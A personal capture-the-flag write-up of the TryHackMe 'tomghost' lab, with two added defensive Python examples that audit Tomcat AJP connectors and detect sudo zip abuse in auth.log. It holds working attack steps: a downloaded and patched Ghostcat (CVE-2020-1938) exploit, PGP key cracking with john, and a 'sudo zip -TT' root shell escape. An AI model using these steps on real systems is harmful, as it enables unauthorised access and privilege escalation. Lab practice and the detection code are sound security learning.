[TryHackMe] tomghost #Writeup


Introduction

This is a memo for my own reference.

Compromise this machine and obtain user.txt

Port scan with nmap.

$ nmap 10.10.68.1

Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-18 06:47 BST
Nmap scan report for ip-10-10-68-1.eu-west-1.compute.internal (10.10.68.1)
Host is up (0.00036s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
8009/tcp open  ajp13
8080/tcp open  http-proxy
MAC Address: 02:65:81:20:88:7F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds

Apache Tomcat was running on port 8080.
Search for hidden directories with gobuster.

$ gobuster dir -u http://10.10.68.1:8080 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.68.1:8080
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/07/18 07:09:20 Starting gobuster
===============================================================
/docs (Status: 302)
/examples (Status: 302)
/favicon.ico (Status: 200)
/host-manager (Status: 302)
/manager (Status: 302)
===============================================================
2024/07/18 07:09:23 Finished
===============================================================

I poked around the pages but found nothing of note.
Since Tomcat 9.0.30 is in use, I'll look into vulnerabilities in this version.

I found a nasty one with a CVSS score of 9.8.

Looking into it, CVE-2020-1938 is apparently known as "Ghostcat".

I'll try to see whether I can use this.
First, download it.

wget https://raw.githubusercontent.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat/main/CVE-2020-1938.py

Use it as its instructions describe.

$ python CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.10.68.1 -p 8009 -f WEB-INF/web.xml
Traceback (most recent call last):
  File "CNVD-2020-10487-Tomcat-Ajp-lfi.py", line 295, in <module>
    t = Tomcat(args.target, args.port)
  File "CNVD-2020-10487-Tomcat-Ajp-lfi.py", line 262, in __init__
    self.stream = self.socket.makefile("rb", bufsize=0)
TypeError: makefile() got an unexpected keyword argument 'bufsize'

It raised an error, so I rewrote the offending line as:
self.stream = self.socket.makefile("rb", 0)

python CVE-2020-1938.py 10.10.68.1 -p 8009 -f WEB-INF/web.xml
Getting resource at ajp13://10.10.68.1:8009/asdf
----------------------------
Traceback (most recent call last):
  File "CVE-2020-1938.py", line 301, in <module>
    print("".join([d.data for d in data]))
TypeError: sequence item 0: expected str instance, bytes found

It raised another error, so I rewrote that line as:
print(b"".join([d.data for d in data]))

$ python CVE-2020-1938.py 10.10.68.1 -p 8009 -f WEB-INF/web.xml
Getting resource at ajp13://10.10.68.1:8009/asdf
----------------------------
b'<?xml version="1.0" encoding="UTF-8"?>\n<!--\n Licensed to the Apache Software Foundation (ASF) under one or more\n  contributor license agreements.  See the NOTICE file distributed with\n  this work for additional information regarding copyright ownership.\n  The ASF licenses this file to You under the Apache License, Version 2.0\n  (the "License"); you may not use this file except in compliance with\n  the License.  You may obtain a copy of the License at\n\n      http://www.apache.org/licenses/LICENSE-2.0\n\n  Unless required by applicable law or agreed to in writing, software\n  distributed under the License is distributed on an "AS IS" BASIS,\n  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n  See the License for the specific language governing permissions and\n  limitations under the License.\n-->\n<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"\n  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee\n                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"\n  version="4.0"\n  metadata-complete="true">\n\n  <display-name>Welcome to Tomcat</display-name>\n  <description>\n     Welcome to GhostCat\n\tskyfuck:8730281lkjlkjdqlksalks\n  </description>\n\n</web-app>\n\x00'

skyfuck:8730281lkjlkjdqlksalks
Got the username and password.
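From the defender's side, as an added example that is not part of the original writeup or of the exploit script it uses: what Ghostcat needs is an AJP/1.3 connector that listens on a non-loopback address and accepts connections without a shared secret. Tomcat 9.0.31 changed the AJP defaults to a loopback address and secretRequired="true", so a quick audit of server.xml tells you whether a given instance is still in the exposed configuration. The server.xml below is a constructed sample, and the secret value is a placeholder.

```python
"""Audit a Tomcat server.xml for AJP connectors reachable in the way CVE-2020-1938 needs.

Added example, not part of the writeup. Rules applied per AJP connector:
  - no `address` attribute (Tomcat < 9.0.31 then binds every interface) or an
    address that is not loopback  -> reachable from the network
  - secretRequired="false"        -> any client can speak AJP to it
  - secret missing                -> nothing authenticates the reverse proxy
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample server.xml with one HTTP and three AJP connectors.
SAMPLE_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <!-- pre-9.0.31 default shape: all interfaces, no secret -->
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
    <!-- hardened: loopback only, secret required (value is a placeholder) -->
    <Connector port="8010" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET"/>
    <!-- explicitly exposed and secret disabled -->
    <Connector port="8011" protocol="AJP/1.3" address="0.0.0.0" secretRequired="false"/>
  </Service>
</Server>
"""

LOOPBACK_ADDRESSES = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> List[Dict]:
    """Return one finding per AJP connector: port, whether it is exposed, and why."""
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        protocol = conn.get("protocol", "HTTP/1.1")
        if not protocol.upper().startswith("AJP"):
            continue  # HTTP connectors are out of scope for this check
        address = conn.get("address")  # None: old Tomcat default, all interfaces
        secret_required = conn.get("secretRequired", "true").lower() == "true"
        has_secret = bool(conn.get("secret"))

        reasons = []
        if address is None or address not in LOOPBACK_ADDRESSES:
            reasons.append("bound to a non-loopback address")
        if not secret_required:
            reasons.append("secretRequired=false")
        elif not has_secret:
            # 9.0.31+ refuses to start such a connector; older versions run it unauthenticated
            reasons.append("no secret configured")

        findings.append({"port": conn.get("port"), "exposed": bool(reasons), "reasons": reasons})
    return findings


def exposed_ports(server_xml: str) -> List[str]:
    """Convenience: just the ports of connectors that fail the audit."""
    return [f["port"] for f in audit_ajp_connectors(server_xml) if f["exposed"]]


if __name__ == "__main__":
    for finding in audit_ajp_connectors(SAMPLE_SERVER_XML):
        status = "EXPOSED" if finding["exposed"] else "ok"
        print(f"AJP connector on port {finding['port']}: {status} {finding['reasons']}")
```

If nothing in front of Tomcat actually speaks AJP (no mod_jk or mod_proxy_ajp reverse proxy), the simplest fix is to comment the connector out entirely; a loopback bind plus a secret is the configuration for the case where a proxy on the same host does need it.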

$ ssh skyfuck@10.10.68.1
The authenticity of host '10.10.68.1 (10.10.68.1)' can't be established.
ECDSA key fingerprint is SHA256:hNxvmz+AG4q06z8p74FfXZldHr0HJsaa1FBXSoTlnss.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.68.1' (ECDSA) to the list of known hosts.
skyfuck@10.10.68.1's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

skyfuck@ubuntu:~$ 

SSH login succeeded.
Look for user.txt.

$ find / -name user.txt 2> /dev/null
/home/merlin/user.txt

Got user.txt!

Escalate privileges and obtain root.txt

Try sudo -l.

$ sudo -l
[sudo] password for skyfuck: 
Sorry, user skyfuck may not run sudo on ubuntu.

No luck.

$ ls
credential.pgp  tryhackme.asc

Check the two files in skyfuck's home directory.

tryhackme.asc contained the public key for credential.pgp.
I want to crack the key and see what's inside credential.pgp.

To decrypt it, copy tryhackme.asc to my local machine.

$ scp skyfuck@10.10.68.1:tryhackme.asc tryhackme.asc
skyfuck@10.10.68.1's password: 
tryhackme.asc                                 100% 5144     1.9MB/s   00:00 

I want to crack it with John the Ripper, so convert the key into John's format.

$ gpg2john tryhackme.asc > hash.txt

File tryhackme.asc

Crack it with john.

$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "gpg", but the string is also recognized as "gpg-opencl"
Use the "--format=gpg-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru        (tryhackme)
1g 0:00:00:00 DONE (2024-07-18 08:37) 6.250g/s 6700p/s 6700c/s 6700C/s chinita..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Now that I know the passphrase, let's look at credential.pgp.

$ gpg --import tryhackme.asc
gpg: directory `/home/skyfuck/.gnupg' created
gpg: new configuration file `/home/skyfuck/.gnupg/gpg.conf' created
gpg: WARNING: options in `/home/skyfuck/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/home/skyfuck/.gnupg/secring.gpg' created
gpg: keyring `/home/skyfuck/.gnupg/pubring.gpg' created
gpg: key C6707170: secret key imported
gpg: /home/skyfuck/.gnupg/trustdb.gpg: trustdb created
gpg: key C6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key C6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
skyfuck@ubuntu:~$ gpg --decrypt credential.pgp

You need a passphrase to unlock the secret key for
user: "tryhackme <stuxnet@tryhackme.com>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

Got merlin's password.

$ ssh merlin@10.10.68.1
merlin@10.10.68.1's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Tue Mar 10 22:56:49 2020 from 192.168.85.1
merlin@ubuntu:~$ 

SSH login succeeded.

$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip

The zip command can be run with root privileges.

Use the command I looked up on GTFOBins.

$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# sudo rm $TF
rm: missing operand
Try 'rm --help' for more information.
# whoami
root
# cat /root/root.txt
THM{**********}

Got root.txt!!
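As an added example from the defender's side, not part of the writeup: every sudo invocation, allowed or denied, is written to auth.log via syslog, and the misuse of the NOPASSWD zip rule above is recognisable there because zip is run as root with its -TT (--unzip-command) option, which is what hands zip an arbitrary command to execute. The log lines below are constructed in sudo's syslog format; the usernames are the ones from the writeup and the paths are made up.

```python
"""Flag sudo log lines where zip is run as root with -TT / --unzip-command.

Added example, not part of the writeup. Two rules:
  - zip-unzip-command-as-root: USER=root and the zip command line carries
    -TT or --unzip-command (zip then executes that command as root)
  - sudo-denied: a user that is not in sudoers tried sudo at all
"""
import os
import re
from typing import Dict, List, Optional

# Constructed sample lines in the format sudo writes to /var/log/auth.log.
SAMPLE_AUTH_LOG = """\
Jul 18 08:51:02 ubuntu sudo:   merlin : TTY=pts/0 ; PWD=/home/merlin ; USER=root ; COMMAND=/usr/bin/zip /tmp/backup.zip /home/merlin/notes.txt
Jul 18 08:52:11 ubuntu sudo:   merlin : TTY=pts/0 ; PWD=/home/merlin ; USER=root ; COMMAND=/usr/bin/zip /tmp/tmp.K3zQ /etc/hosts -T -TT sh #
Jul 18 08:53:40 ubuntu sudo:  skyfuck : user NOT in sudoers ; TTY=pts/1 ; PWD=/home/skyfuck ; USER=root ; COMMAND=/bin/ls
Jul 18 08:54:05 ubuntu sudo:   merlin : TTY=pts/0 ; PWD=/home/merlin ; USER=root ; COMMAND=/usr/bin/zip --unzip-command=/bin/sh archive.zip file
"""

# "sudo:" is followed by padding spaces, then the invoking user, " : ", then the fields.
SUDO_LINE_RE = re.compile(r"sudo:\s+(?P<user>\S+) : (?P<body>.*)$")


def parse_sudo_line(line: str) -> Optional[Dict]:
    """Split one sudo syslog line into user, denied flag, target user and command."""
    m = SUDO_LINE_RE.search(line)
    if not m:
        return None
    user, body = m.group("user"), m.group("body")
    cmd_idx = body.find("COMMAND=")
    head = body if cmd_idx < 0 else body[:cmd_idx]
    fields = {}
    for part in head.split(" ; "):  # "TTY=pts/0", "PWD=/home/merlin", "USER=root", ...
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    command = body[cmd_idx + len("COMMAND="):].strip() if cmd_idx >= 0 else ""
    return {
        "user": user,
        "denied": "NOT in sudoers" in head,
        "target": fields.get("USER"),
        "command": command,
    }


def zip_runs_unzip_command(command: str) -> bool:
    """True when the command is zip invoked with -TT or --unzip-command."""
    tokens = command.split()
    if not tokens or os.path.basename(tokens[0]) != "zip":
        return False
    return any(t == "-TT" or t.startswith("--unzip-command") for t in tokens[1:])


def detect(log_text: str) -> List[Dict]:
    """Run both rules over a block of auth.log text and return the alerts in order."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_sudo_line(line)
        if event is None:
            continue
        if event["denied"]:
            alerts.append({"rule": "sudo-denied", "user": event["user"], "command": event["command"]})
        elif event["target"] == "root" and zip_runs_unzip_command(event["command"]):
            alerts.append({"rule": "zip-unzip-command-as-root", "user": event["user"], "command": event["command"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_AUTH_LOG):
        print(f"[{alert['rule']}] {alert['user']}: {alert['command']}")
```

Detection is the second line of defence here; the first is the sudoers rule itself. A NOPASSWD entry with no argument restriction hands over every option zip supports, and sudoers argument matching is not a reliable way to carve out just the safe ones, so the rule is better removed or replaced by a wrapper script that builds the zip command line itself.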
